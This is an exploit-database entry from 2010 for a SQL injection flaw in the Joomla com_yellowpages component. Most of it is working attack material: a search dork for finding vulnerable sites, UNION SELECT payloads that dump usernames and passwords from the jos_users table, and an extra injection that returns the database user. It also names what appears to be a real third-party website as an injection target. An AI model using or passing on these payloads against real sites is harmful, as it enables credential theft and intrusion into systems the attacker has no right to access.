Joomla Component com_yellowpages SQL Injection Vulnerability

2010-08-09T00:00:00
ID 1337DAY-ID-13635
Type zdt
Reporter _aL_bayraqim_
Modified 2010-08-09T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ============================================================
Joomla Component com_yellowpages SQL Injection Vulnerability 
============================================================


# Author : _aL_bayraqim_?
# BORDO BERELщLER GRUP KOMUTANLIGI [..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!]

############################################################
Dork = inurl:/index.php?option=com_yellowpages?
############################################################
--- SQL Injection Vulenrability ---
SQL Injection Vulenrability component "com_yellowpages"
http://find.co.ke/newfind/index.php?option=com_yellowpages&cat=1923[SQL]
############################################################
===[Injection]===
[SQL] = http://find.co.ke/newfind/index.php?option=com_yellowpages&cat=-1 923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
+Union+select+user()+from+jos_users--
############################################################



#  0day.today [2016-04-20]  #